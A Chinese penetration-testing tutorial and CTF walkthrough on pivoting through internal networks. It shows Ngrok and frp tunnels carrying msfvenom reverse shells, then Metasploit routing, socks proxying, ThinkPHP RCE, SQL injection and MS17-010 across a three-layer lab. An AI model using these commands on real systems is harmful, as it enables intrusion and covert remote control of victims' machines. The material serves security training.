


内网渗透
必要基础知识点:
1.区分内外网
IPv4地址设计时保留了一部分作为私有地址,它们不会被当作共有地址分配出去,而是只在局域网内使用
地址段 掩码
10.x.x.x 255.0.0.0
172.16.x.x-172.31.x.x 255.240.0.0
192.168.x.x 255.255.0.0
2.内网间的通信问题
使用代理技术,不然无法通信
3.正向反向协议通信连接问题
正向:控制端到被控端
反向:被控端到控制端
4.内网穿透代理隧道技术说明
隧道:应对流量监控工具和防火墙的过滤
代理:解决网络的连通性

局域网示意图

三层漫游示意图
内网穿透Ngrok测试演示-两个内网通讯上线
http://www.ngrok.cc/
实验环境:两个不同的内网(有网络)实现穿透控制
1.注册-购买-填写-确认
注册账号,根据操作系统选择对应的客户端
不会使用可以看使用教程
选“开通隧道”,根据需要购买服务器
隧道协议选择后门要使用的协议,随便写一个名称和域名
本地端口是攻击机的地址端口。可以先随便写,后面可以改
如果希望隧道有验证身份的用户名和密码可以填写验证用户名和验证密码
2.测试:内网1执行后门-免费主机处理-内网2监听-内网2接受器
攻击机要安装Ngrok,被攻击机只需要正常启动
下载好Ngrok的文件sunny,来到所在文件夹
运行sunny
./sunny clientid [隧道id]
./sunny clientid aa0676878c162ffc
显示online说明登录成功。被攻击机访问Forwarding里的网址会指向到填写的本地端口
生成后门,注意选择对应的网络协议,填写好地址
msfvenom -p windows/meterpreter/reverse_http lhost=xiaodisec.free.idcfengye.com lport=80 -f exe -o
监听后门,监听之前填的本地端口
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.76.132
set lport 4444
Exploit
在被攻击机执行后门
内网穿透Frp自建跳板测试-两个内网通讯上线
自行搭建,方便修改,成本低,使用多样化,适合高富帅及隐私哥哥们
1.服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)
服务器修改配置文件frps.ini:
[common]
bind_port = 6677 #frps工作端口,必须和frpc保持一致
启动服务端:
./frps -c ./frps.ini
2.控制端-下载-解压-修改-启动
控制端修改配置文件frpc.ini:
[common]
server_addr = [你的云主机ip]
server_port = 6677 #frpc工作端口,必须和frps保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555 #转发给本机的5555
remote_port = 6000 #服务端用6000端口转发给本机
启动客户端:
./frpc -c ./frpc.ini
生成后门
msfvenom -p windows/meterpreter/reverse_tcp lhost=[服务器IP地址] lport=6000 -f exe -o frp.exe
监听后门
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5555
exploit
3.靶机运行frp即可
CFS三层内网漫游安全测试演练-某CTF线下2019
来源:2019某CTF线下赛真题内网结合WEB攻防题库,涉及WEB攻击,内网代理路由等技术,每台服务器存在一个Flag,获取每一个Flag对应一个积分,获取三个Flag结束。
Target1:
探针目标-利用WEB漏洞(TP5_RCE)-获取webshell权限-获取Flag-Target2
0.端口扫描,发现目标主机。发现ThinkPHPv5框架,使用对应的exp写入后门
1.生成后门:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.76.132 LPORT=1111 -f elf >t1.elf
2.接受反弹:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.76.132
set LPORT 1111
exploit
3.信息收集及配置访问
探索内网并添加路由,从而发现和联系上内网
获取网络接口:run get_local_subnets
查看路由地址:run autoroute -p
添加路由地址:run autoroute -s 192.168.22.0/24
在target1上创建代理,使target2可以连通Kali
开启本地代理:
use auxiliary/server/socks4a
set srvport 2222
exploit
4.利用本地代理接口访问测试
linux:
配置proxychains后调用工具探针Target2
/etc/proxychains.conf
socks4 192.168.76.132 2222
proxychains4 nmap -sT -Pn 192.168.22.0/24 -p80
-Pn:不使用ping扫描,不执行主机发现,默认目标主机是存活的,可以绕开防火墙。
-sT:使用TCP连接,与目标三次握手,来确定端口是否开放
windows:
利用代理工具Proxifier或SocksCap64载入代理进行进程访问测试
工具:
为了顺利访问到Target2的网页,需要设置浏览器代理进行访问
其他工具也需要设置代理
Target2:
探针目标-利用WEB漏洞(SQL注入)-后台获取webshell权限-获取Flag-Target3
0.漏洞利用,注入:
http://192.168.22.128/index.php?r=vul&keyword=1 #sql注入
http://192.168.22.128/index.php?r=admini/public/login #后台
http://192.168.22.128/index.php?r=special #后门shell
通过robots.txt找到后台登陆地址,通过后台功能拿webshell
1.生成正向后门:
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > t2.elf
2.访问接受:
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.128
set LPORT 3333
exploit
3.信息收集及配置访问
获取网络接口:run get_local_subnets
查看路由地址:run autoroute -p
添加路由地址:run autoroute -s 192.168.33.0/24
4.利用本地代理接口访问测试
Target3:
探针目标-端口及漏洞扫描-利用MS17010获取系统权限-获取Flag-GG
漏洞利用,找到flag
proxychains4 nmap -Pn -sT 192.168.33.33
use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.33.33
exploit
shell
dir /S flag.txt /B
type xxxxx.txt
涉及资源:
Sunny-Ngrok(也提供FRP):http://www.ngrok.cc/
了解如何部署、使用frp:https://gofrp.org/docs/
frp:https://github.com/fatedier/frp
CFS三层靶机环境:https://pan.baidu.com/s/1l5-TOVe9FO8mEjCiZ4mtMQ 提取码:xiao